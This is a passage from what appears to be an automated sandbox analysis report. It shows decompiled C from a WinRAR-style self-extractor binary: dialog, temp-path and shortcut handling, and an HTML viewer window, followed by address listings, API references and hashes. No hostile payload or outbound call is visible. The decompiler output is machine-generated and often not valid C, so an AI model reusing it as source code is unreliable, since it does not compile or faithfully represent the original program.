                                                                            													_pop(__ecx);
                                                                            													_pop(__ecx);
                                                                            													 *__ebx = __di;
                                                                            													goto L145;
                                                                            												}
                                                                            												L139:
                                                                            												 *(__ebp - 0x1c3c) = __ax;
                                                                            												__eax =  &(__esi->i);
                                                                            												_push( &(__esi->i));
                                                                            												__eax = __ebp - 0x1c3a;
                                                                            												goto L143;
                                                                            											}
                                                                            											L136:
                                                                            											_push(0x2f);
                                                                            											_pop(__edx);
                                                                            											__eflags = __ax - __dx;
                                                                            											if(__ax != __dx) {
                                                                            												goto L146;
                                                                            											}
                                                                            											goto L137;
                                                                            											L146:
                                                                            											__esi =  &(__esi->i);
                                                                            											__eflags = __esi->i - __di;
                                                                            										} while (__esi->i != __di);
                                                                            										__eflags = __ebx;
                                                                            										if(__ebx != 0) {
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											 *__ebx = __ax;
                                                                            										}
                                                                            										goto L149;
                                                                            									} else {
                                                                            										L130:
                                                                            										__ebp - 0x19c8a = __ebp - 0x6c84;
                                                                            										E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
                                                                            										_push(__ebx);
                                                                            										_push(__ebp - 0x6c82);
                                                                            										__eax = E001B0BB8(__ecx);
                                                                            										__esp = __esp + 0x10;
                                                                            										__eflags = __eax;
                                                                            										if(__eax != 0) {
                                                                            											__ecx = 0;
                                                                            											 *__eax = __cx;
                                                                            											__ebp - 0x1c3c = E001B4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            										}
                                                                            										L149:
                                                                            										__eflags =  *(__ebp - 0x11c8c);
                                                                            										__ebx = 0x800;
                                                                            										if( *(__ebp - 0x11c8c) != 0) {
                                                                            											_push(0x800);
                                                                            											__eax = __ebp - 0x9c8c;
                                                                            											_push(__ebp - 0x9c8c);
                                                                            											__eax = __ebp - 0x11c8c;
                                                                            											_push(__ebp - 0x11c8c);
                                                                            											__eax = E0019AED7();
                                                                            										}
                                                                            										_push(__ebx);
                                                                            										__eax = __ebp - 0xbc8c;
                                                                            										_push(__ebp - 0xbc8c);
                                                                            										__eax = __ebp - 0x6c84;
                                                                            										_push(__ebp - 0x6c84);
                                                                            										__eax = E0019AED7();
                                                                            										__eflags =  *(__ebp - 0x2c3c);
                                                                            										if(__eflags == 0) {
                                                                            											__ebp - 0x2c3c = E001AA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
                                                                            										}
                                                                            										__ebp - 0x2c3c = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
                                                                            										__eflags =  *((short*)(__ebp - 0x17c8c));
                                                                            										if(__eflags != 0) {
                                                                            											__ebp - 0x17c8c = __ebp - 0x2c3c;
                                                                            											E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
                                                                            											__eax = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
                                                                            										}
                                                                            										__ebp - 0x2c3c = __ebp - 0xcc8c;
                                                                            										__eax = E001B4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
                                                                            										__eflags =  *(__ebp - 0x13c8c);
                                                                            										__eax = __ebp - 0x13c8c;
                                                                            										_pop(__ecx);
                                                                            										_pop(__ecx);
                                                                            										if(__eflags == 0) {
                                                                            											__eax = __ebp - 0x19c8c;
                                                                            										}
                                                                            										__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
                                                                            										__eax = __ebp - 0x2c3c;
                                                                            										__eflags = E0019B153(__ebp - 0x2c3c);
                                                                            										if(__eflags == 0) {
                                                                            											L159:
                                                                            											__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
                                                                            											goto L160;
                                                                            										} else {
                                                                            											L158:
                                                                            											__eflags = __eax;
                                                                            											if(__eflags == 0) {
                                                                            												L160:
                                                                            												_push(1);
                                                                            												__eax = __ebp - 0x2c3c;
                                                                            												_push(__ebp - 0x2c3c);
                                                                            												E00199D3A(__ecx, __ebp) = __ebp - 0xbc8c;
                                                                            												__ebp - 0xac8c = E001B4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
                                                                            												_pop(__ecx);
                                                                            												_pop(__ecx);
                                                                            												__ebp - 0xac8c = E0019B98D(__eflags, __ebp - 0xac8c);
                                                                            												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
                                                                            												__eax = __ebp - 0x1c3c;
                                                                            												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
                                                                            												__edx = __ebp - 0x9c8c;
                                                                            												__esi = __ebp - 0xac8c;
                                                                            												asm("sbb ecx, ecx");
                                                                            												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
                                                                            												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
                                                                            												asm("sbb eax, eax");
                                                                            												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
                                                                            												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
                                                                            												__eax = __ebp - 0x15c8c;
                                                                            												asm("sbb edx, edx");
                                                                            												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
                                                                            												E001A9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
                                                                            												__ebp - 0xbc8c = E001A9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
                                                                            												__eflags =  *(__ebp - 0xcc8c);
                                                                            												if( *(__ebp - 0xcc8c) != 0) {
                                                                            													_push(__edi);
                                                                            													__eax = __ebp - 0xcc8c;
                                                                            													_push(__ebp - 0xcc8c);
                                                                            													_push(5);
                                                                            													_push(0x1000);
                                                                            													__eax =  *0x1cdef8();
                                                                            												}
                                                                            												goto L164;
                                                                            											}
                                                                            											goto L159;
                                                                            										}
                                                                            									}
                                                                            								case 0xb:
                                                                            									L162:
                                                                            									__eflags = __ebx - 7;
                                                                            									if(__ebx == 7) {
                                                                            										 *0x1d9600 = 1;
                                                                            									}
                                                                            									goto L164;
                                                                            								case 0xc:
                                                                            									L83:
                                                                            									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            									__eax = E001B59C0( *(__ebp - 0x5c84) & 0x0000ffff);
                                                                            									__eflags = __eax - 0x46;
                                                                            									if(__eax == 0x46) {
                                                                            										 *0x1d75d4 = 1;
                                                                            									} else {
                                                                            										__eflags = __eax - 0x55;
                                                                            										if(__eax == 0x55) {
                                                                            											 *0x1d75d5 = 1;
                                                                            										} else {
                                                                            											__eax = 0;
                                                                            											 *0x1d75d4 = __al;
                                                                            											 *0x1d75d5 = __al;
                                                                            										}
                                                                            									}
                                                                            									goto L164;
                                                                            								case 0xd:
                                                                            									L93:
                                                                            									 *0x1ede21 = 1;
                                                                            									__eax = __eax + 0x1ede21;
                                                                            									_t104 = __esi + 0x39;
                                                                            									 *_t104 =  *(__esi + 0x39) + __esp;
                                                                            									__eflags =  *_t104;
                                                                            									__ebp = 0xffffa37c;
                                                                            									if( *_t104 != 0) {
                                                                            										_t106 = __ebp - 0x5c84; // 0xffff46f8
                                                                            										__eax = _t106;
                                                                            										_push(_t106);
                                                                            										 *0x1cd5fc = E001A13FC();
                                                                            									}
                                                                            									goto L164;
                                                                            							}
                                                                            							L2:
                                                                            							_t210 = E001A9E24(_t210, _t279);
                                                                            							_t279 = _t279 + 0x2000;
                                                                            							_t277 = _t277 - 1;
                                                                            							if(_t277 != 0) {
                                                                            								goto L2;
                                                                            							} else {
                                                                            								_t280 = _t277;
                                                                            								goto L4;
                                                                            							}
                                                                            						}
                                                                            						L165:
                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
                                                                            						return _t209;
                                                                            					}
                                                                            					L100:
                                                                            					__eflags =  *0x1e5d02;
                                                                            					if( *0x1e5d02 != 0) {
                                                                            						goto L164;
                                                                            					}
                                                                            					L101:
                                                                            					__eax = 0;
                                                                            					 *(__ebp - 0x143c) = __ax;
                                                                            					__eax = __ebp - 0x5c84;
                                                                            					_push(__ebp - 0x5c84);
                                                                            					__eax = E001B0BB8(__ecx);
                                                                            					_pop(__ecx);
                                                                            					__ecx = 0x2c;
                                                                            					__eflags = __eax;
                                                                            					if(__eax != 0) {
                                                                            						L108:
                                                                            						__eflags =  *(__ebp - 0x143c);
                                                                            						if( *(__ebp - 0x143c) == 0) {
                                                                            							__ebp - 0x1bc8c = __ebp - 0x5c84;
                                                                            							E0019FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
                                                                            							__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
                                                                            						}
                                                                            						__ebp - 0x5c84 = E001A9C4F(__ebp - 0x5c84);
                                                                            						__eax = 0;
                                                                            						 *(__ebp - 0x4c84) = __ax;
                                                                            						__ebp - 0x143c = __ebp - 0x5c84;
                                                                            						__eax = E001A9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
                                                                            						__eflags = __eax - 6;
                                                                            						if(__eax == 6) {
                                                                            							goto L164;
                                                                            						} else {
                                                                            							L111:
                                                                            							__eax = 0;
                                                                            							__eflags = 0;
                                                                            							 *0x1d75d7 = 1;
                                                                            							 *0x1d85fa = __ax;
                                                                            							__eax = EndDialog( *(__ebp + 8), 1);
                                                                            							goto L112;
                                                                            						}
                                                                            					}
                                                                            					L102:
                                                                            					__esi = 0;
                                                                            					__eflags =  *(__ebp - 0x5c84) - __dx;
                                                                            					if( *(__ebp - 0x5c84) == __dx) {
                                                                            						goto L108;
                                                                            					}
                                                                            					L103:
                                                                            					__ecx = 0;
                                                                            					__eax = __ebp - 0x5c84;
                                                                            					while(1) {
                                                                            						L104:
                                                                            						__eflags =  *__eax - 0x40;
                                                                            						if( *__eax == 0x40) {
                                                                            							break;
                                                                            						}
                                                                            						L105:
                                                                            						__esi =  &(__esi->i);
                                                                            						__eax = __ebp - 0x5c84;
                                                                            						__ecx = __esi + __esi;
                                                                            						__eax = __ebp - 0x5c84 + __ecx;
                                                                            						__eflags =  *__eax - __dx;
                                                                            						if( *__eax != __dx) {
                                                                            							continue;
                                                                            						}
                                                                            						L106:
                                                                            						goto L108;
                                                                            					}
                                                                            					L107:
                                                                            					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
                                                                            					__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
                                                                            					__eax = 0;
                                                                            					__eflags = 0;
                                                                            					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
                                                                            					goto L108;
                                                                            					L112:
                                                                            					__eflags = _t263 - 7;
                                                                            					if(_t263 == 7) {
                                                                            						__eflags =  *0x1d95fc;
                                                                            						if( *0x1d95fc == 0) {
                                                                            							 *0x1d95fc = 2;
                                                                            						}
                                                                            						 *0x1d85f8 = 1;
                                                                            					}
                                                                            					goto L164;
                                                                            				}
                                                                            			}










                                                                            0x001ab8d2
                                                                            0x001ab8d9
                                                                            0x001ab8da
                                                                            0x001ab8e0
                                                                            0x001ab8e1
                                                                            0x001ab8e4
                                                                            0x001ab8e5
                                                                            0x001ab8e6
                                                                            0x001ab8eb
                                                                            0x001ab8ee
                                                                            0x001ab8f4
                                                                            0x001ab8fd
                                                                            0x001ab900
                                                                            0x001ab905
                                                                            0x001ab907
                                                                            0x001ab909
                                                                            0x001ab90b
                                                                            0x001ab90b
                                                                            0x001ab90d
                                                                            0x001ab90d
                                                                            0x001ab90f
                                                                            0x001ab90f
                                                                            0x001ab917
                                                                            0x001ab91e
                                                                            0x001ab920
                                                                            0x001ab927
                                                                            0x001ab92d
                                                                            0x001ab92f
                                                                            0x001ab930
                                                                            0x001ab938
                                                                            0x001ab947
                                                                            0x001ab947
                                                                            0x001ab938
                                                                            0x001ab952
                                                                            0x001ab954
                                                                            0x001ab963
                                                                            0x001ab969
                                                                            0x001ab96f
                                                                            0x001ab97a
                                                                            0x001ab97a
                                                                            0x00000000
                                                                            0x001ab96f
                                                                            0x001ab8a7
                                                                            0x001ab8a7
                                                                            0x001ab8ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab8ac
                                                                            0x001ab872
                                                                            0x001ab872
                                                                            0x001ab876
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab878
                                                                            0x001ab878
                                                                            0x001ab87b
                                                                            0x001ab87d
                                                                            0x001ab880
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab886
                                                                            0x001ab88f
                                                                            0x00000000
                                                                            0x001ab88f
                                                                            0x00000000
                                                                            0x001aba2b
                                                                            0x001aba2b
                                                                            0x001aba2c
                                                                            0x001aba31
                                                                            0x001aba33
                                                                            0x001aba36
                                                                            0x001aba36
                                                                            0x00000000
                                                                            0x001aba6c
                                                                            0x001aba6c
                                                                            0x001aba73
                                                                            0x001aba75
                                                                            0x001aba75
                                                                            0x001aba77
                                                                            0x001abaa6
                                                                            0x001abaa6
                                                                            0x001abaac
                                                                            0x00000000
                                                                            0x001abaac
                                                                            0x001aba79
                                                                            0x001aba79
                                                                            0x001aba79
                                                                            0x001aba7c
                                                                            0x001aba95
                                                                            0x001aba95
                                                                            0x001aba9b
                                                                            0x001aba9b
                                                                            0x00000000
                                                                            0x001aba9b
                                                                            0x001aba7e
                                                                            0x001aba7e
                                                                            0x001aba7e
                                                                            0x001aba81
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aba83
                                                                            0x001aba83
                                                                            0x001aba83
                                                                            0x001aba86
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aba8c
                                                                            0x001aba8c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abaf9
                                                                            0x001abaf9
                                                                            0x001abafc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abafe
                                                                            0x001abafe
                                                                            0x001abb0a
                                                                            0x001abb0f
                                                                            0x001abb10
                                                                            0x001abb11
                                                                            0x001abb13
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abb15
                                                                            0x001abb15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd07
                                                                            0x001abd07
                                                                            0x001abd0a
                                                                            0x001abd0c
                                                                            0x001abd13
                                                                            0x001abd15
                                                                            0x001abd1b
                                                                            0x001abd1c
                                                                            0x001abd21
                                                                            0x001abd22
                                                                            0x001abd22
                                                                            0x001abd27
                                                                            0x001abd2a
                                                                            0x001abd30
                                                                            0x001abd30
                                                                            0x001abd35
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd41
                                                                            0x001abd41
                                                                            0x001abd44
                                                                            0x001abb25
                                                                            0x001abb25
                                                                            0x00000000
                                                                            0x001abb25
                                                                            0x001abd4a
                                                                            0x001abd4a
                                                                            0x001abb16
                                                                            0x001abb16
                                                                            0x001abb1c
                                                                            0x001abb1d
                                                                            0x001abb20
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd51
                                                                            0x001abd51
                                                                            0x001abd54
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd5a
                                                                            0x001abd5a
                                                                            0x001abd5c
                                                                            0x001abd63
                                                                            0x001abd6b
                                                                            0x001abd71
                                                                            0x001abd76
                                                                            0x001abd79
                                                                            0x001abdae
                                                                            0x001abdb3
                                                                            0x001abdb9
                                                                            0x001abdba
                                                                            0x001abdbf
                                                                            0x001abd7b
                                                                            0x001abd7b
                                                                            0x001abd7e
                                                                            0x001abd84
                                                                            0x001abd9a
                                                                            0x001abd9f
                                                                            0x001abda0
                                                                            0x001abda5
                                                                            0x001abd86
                                                                            0x001abd86
                                                                            0x001abd8b
                                                                            0x001abd8c
                                                                            0x001abd91
                                                                            0x001abd91
                                                                            0x001abd84
                                                                            0x001abdc6
                                                                            0x001abdc8
                                                                            0x001abdcf
                                                                            0x001abddd
                                                                            0x001abde4
                                                                            0x001abde9
                                                                            0x001abdea
                                                                            0x001abdeb
                                                                            0x001abded
                                                                            0x001abdee
                                                                            0x001abdf5
                                                                            0x001abe3e
                                                                            0x001abe45
                                                                            0x001abe4a
                                                                            0x001abe4c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abe52
                                                                            0x001abe52
                                                                            0x001abe54
                                                                            0x001abe5a
                                                                            0x001abe61
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abe63
                                                                            0x001abe63
                                                                            0x001abe65
                                                                            0x001abe66
                                                                            0x001abe66
                                                                            0x001abe66
                                                                            0x001abe69
                                                                            0x001abe6c
                                                                            0x001abe76
                                                                            0x001abe76
                                                                            0x001abe78
                                                                            0x001abe7a
                                                                            0x001abe84
                                                                            0x001abe89
                                                                            0x001abe8b
                                                                            0x001abec9
                                                                            0x001abec9
                                                                            0x001abecc
                                                                            0x001abecc
                                                                            0x001abece
                                                                            0x001abecf
                                                                            0x001abecf
                                                                            0x00000000
                                                                            0x001abecf
                                                                            0x001abe8d
                                                                            0x001abe8d
                                                                            0x001abe8f
                                                                            0x001abe90
                                                                            0x001abe92
                                                                            0x001abe95
                                                                            0x001abeaa
                                                                            0x001abeaa
                                                                            0x001abeac
                                                                            0x001abead
                                                                            0x001abead
                                                                            0x001abead
                                                                            0x001abeb0
                                                                            0x001abeb0
                                                                            0x001abeb5
                                                                            0x001abeb6
                                                                            0x001abebc
                                                                            0x001abebc
                                                                            0x001abebd
                                                                            0x001abec2
                                                                            0x001abec3
                                                                            0x001abec4
                                                                            0x00000000
                                                                            0x001abec4
                                                                            0x001abe97
                                                                            0x001abe97
                                                                            0x001abe9e
                                                                            0x001abea1
                                                                            0x001abea2
                                                                            0x00000000
                                                                            0x001abea2
                                                                            0x001abe6e
                                                                            0x001abe6e
                                                                            0x001abe70
                                                                            0x001abe71
                                                                            0x001abe74
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abed1
                                                                            0x001abed1
                                                                            0x001abed4
                                                                            0x001abed4
                                                                            0x001abed9
                                                                            0x001abedb
                                                                            0x001abedd
                                                                            0x001abedd
                                                                            0x001abedf
                                                                            0x001abedf
                                                                            0x00000000
                                                                            0x001abdf7
                                                                            0x001abdf7
                                                                            0x001abdfe
                                                                            0x001abe0a
                                                                            0x001abe10
                                                                            0x001abe11
                                                                            0x001abe12
                                                                            0x001abe17
                                                                            0x001abe1a
                                                                            0x001abe1c
                                                                            0x001abe22
                                                                            0x001abe24
                                                                            0x001abe32
                                                                            0x001abe37
                                                                            0x001abe38
                                                                            0x001abe38
                                                                            0x001abee2
                                                                            0x001abee2
                                                                            0x001abeea
                                                                            0x001abeef
                                                                            0x001abef1
                                                                            0x001abef2
                                                                            0x001abef8
                                                                            0x001abef9
                                                                            0x001abeff
                                                                            0x001abf00

                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 001ABB71
                                                                            • _swprintf.LIBCMT ref: 001ABBA5
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                            • SetDlgItemTextW.USER32(?,00000066,001D85FA), ref: 001ABBC5
                                                                            • _wcschr.LIBVCRUNTIME ref: 001ABBF8
                                                                            • EndDialog.USER32(?,00000001), ref: 001ABCD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                            • String ID: %s%s%u
                                                                            • API String ID: 2892007947-1360425832
                                                                            • Opcode ID: 91f9c86bb7d10c154d64d92ff111d1ca89b0665d38d4c3157af7f72c85bed845
                                                                            • Instruction ID: 99c5f4c3857be3a74e707d77903b321ba218c6657e44b9de7d439685da27fd5d
                                                                            • Opcode Fuzzy Hash: 91f9c86bb7d10c154d64d92ff111d1ca89b0665d38d4c3157af7f72c85bed845
                                                                            • Instruction Fuzzy Hash: DB41BB7A900259AEEF25DBA4DC85FEE77B8EB15314F0040A6F409E6151EF718B848FA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E001A88BF(void* __edx) {
                                                                            				void* __ecx;
                                                                            				void* _t20;
                                                                            				short* _t24;
                                                                            				void* _t28;
                                                                            				signed int _t29;
                                                                            				intOrPtr _t31;
                                                                            				intOrPtr* _t38;
                                                                            				void* _t44;
                                                                            				void* _t58;
                                                                            				intOrPtr* _t60;
                                                                            				short* _t62;
                                                                            				short* _t64;
                                                                            				intOrPtr* _t67;
                                                                            				long _t69;
                                                                            				void* _t71;
                                                                            				void* _t72;
                                                                            
                                                                            				_t58 = __edx;
                                                                            				_t43 = _t44;
                                                                            				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
                                                                            					return _t20;
                                                                            				}
                                                                            				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
                                                                            				_t60 =  *((intOrPtr*)(_t71 + 0x18));
                                                                            				 *((char*)(_t71 + 0x1c)) = E001A87A5(_t60);
                                                                            				_push(0x200 + E001B2B33(_t60) * 2);
                                                                            				_t24 = E001B2B53(_t44);
                                                                            				_t64 = _t24;
                                                                            				if(_t64 == 0) {
                                                                            					L16:
                                                                            					return _t24;
                                                                            				}
                                                                            				E001B4D7E(_t64, L"<html>");
                                                                            				E001B66ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                            				E001B66ED(_t64, L"utf-8\"></head>");
                                                                            				_t72 = _t71 + 0x18;
                                                                            				_t67 = _t60;
                                                                            				_t28 = 0x20;
                                                                            				if( *_t60 != _t28) {
                                                                            					L4:
                                                                            					_t29 = E001A1432(_t76, _t67, L"<html>", 6);
                                                                            					asm("sbb al, al");
                                                                            					_t31 =  ~_t29 + 1;
                                                                            					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
                                                                            					if(_t31 != 0) {
                                                                            						_t60 = _t67 + 0xc;
                                                                            					}
                                                                            					E001B66ED(_t64, _t60);
                                                                            					if( *((char*)(_t72 + 0x1c)) == 0) {
                                                                            						E001B66ED(_t64, L"</html>");
                                                                            					}
                                                                            					_t79 =  *((char*)(_t72 + 0x1c));
                                                                            					if( *((char*)(_t72 + 0x1c)) == 0) {
                                                                            						_push(_t64);
                                                                            						_t64 = E001A8ACA(_t58, _t79);
                                                                            					}
                                                                            					_t69 = 9 + E001B2B33(_t64) * 6;
                                                                            					_t62 = GlobalAlloc(0x40, _t69);
                                                                            					if(_t62 != 0) {
                                                                            						_t13 = _t62 + 3; // 0x3
                                                                            						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
                                                                            							 *_t62 = 0;
                                                                            						} else {
                                                                            							 *_t62 = 0xbbef;
                                                                            							 *((char*)(_t62 + 2)) = 0xbf;
                                                                            						}
                                                                            					}
                                                                            					L001B2B4E(_t64);
                                                                            					_t24 =  *0x1cdff8(_t62, 1, _t72 + 0x10);
                                                                            					if(_t24 >= 0) {
                                                                            						E001A87DC( *((intOrPtr*)(_t43 + 0x10)));
                                                                            						_t38 =  *((intOrPtr*)(_t72 + 0xc));
                                                                            						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
                                                                            					}
                                                                            					goto L16;
                                                                            				} else {
                                                                            					goto L3;
                                                                            				}
                                                                            				do {
                                                                            					L3:
                                                                            					_t67 = _t67 + 2;
                                                                            					_t76 =  *_t67 - _t28;
                                                                            				} while ( *_t67 == _t28);
                                                                            				goto L4;
                                                                            			}



















                                                                            0x001a89fc
                                                                            0x001a89fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a8931
                                                                            0x001a8931
                                                                            0x001a8931
                                                                            0x001a8934
                                                                            0x001a8934
                                                                            0x00000000

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A87A0), ref: 001A8994
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001A89B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocByteCharGlobalMultiWide
                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                            • API String ID: 3286310052-4209811716
                                                                            • Opcode ID: e9a2e42988651268bfe43e90e1d4b77decdc63f70fa2af36dd697fbec1cbf325
                                                                            • Instruction ID: 3bb04c541213b9a7a405ba8115a26173f42f0023ccfa0ec84826992e883efe22
                                                                            • Opcode Fuzzy Hash: e9a2e42988651268bfe43e90e1d4b77decdc63f70fa2af36dd697fbec1cbf325
                                                                            • Instruction Fuzzy Hash: E23112761053027EE714ABA09C46FBBBB98DFA2324F14851EF424961C2EF74D90987A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 43%
                                                                            			E001A8FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                                                                            				struct tagRECT _v16;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v36;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				intOrPtr _t32;
                                                                            				struct HWND__* _t43;
                                                                            				intOrPtr* _t51;
                                                                            				void* _t58;
                                                                            				WCHAR* _t65;
                                                                            				struct HWND__* _t66;
                                                                            
                                                                            				_t66 = _a8;
                                                                            				_t51 = __ecx;
                                                                            				 *(__ecx + 8) = _t66;
                                                                            				 *((char*)(__ecx + 0x26)) = _a20;
                                                                            				ShowWindow(_t66, 0);
                                                                            				E001A8D3F(_t51, _a4);
                                                                            				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
                                                                            					L001B2B4E( *((intOrPtr*)(_t51 + 0x1c)));
                                                                            				}
                                                                            				if(_a12 != 0) {
                                                                            					_push(_a12);
                                                                            					_t32 = E001B668C(_t51, _t58);
                                                                            				} else {
                                                                            					_t32 = 0;
                                                                            				}
                                                                            				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
                                                                            				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
                                                                            				GetWindowRect(_t66,  &_v16);
                                                                            				 *0x1cdf88(0,  *0x1cdfd4(_t66,  &_v16, 2));
                                                                            				if( *(_t51 + 4) != 0) {
                                                                            					 *0x1cdf90( *(_t51 + 4));
                                                                            				}
                                                                            				_t39 = _v36;
                                                                            				_t19 = _t39 + 1; // 0x1
                                                                            				_t43 =  *0x1cdf98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x1cdfd4(_t66, 0,  *_t51, _t51, _t58));
                                                                            				 *(_t51 + 4) = _t43;
                                                                            				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
                                                                            					__eflags = _t43;
                                                                            					if(_t43 != 0) {
                                                                            						ShowWindow(_t43, 5);
                                                                            						return  *0x1cdf8c( *(_t51 + 4));
                                                                            					}
                                                                            				} else {
                                                                            					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
                                                                            						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
                                                                            						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
                                                                            							_t43 = E001A8E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
                                                                            							_t65 = _t43;
                                                                            							if(_t65 != 0) {
                                                                            								ShowWindow(_t66, 5);
                                                                            								SetWindowTextW(_t66, _t65);
                                                                            								return L001B2B4E(_t65);
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t43;
                                                                            			}















                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000), ref: 001A8FFF
                                                                            • GetWindowRect.USER32(?,00000000), ref: 001A9044
                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 001A90DB
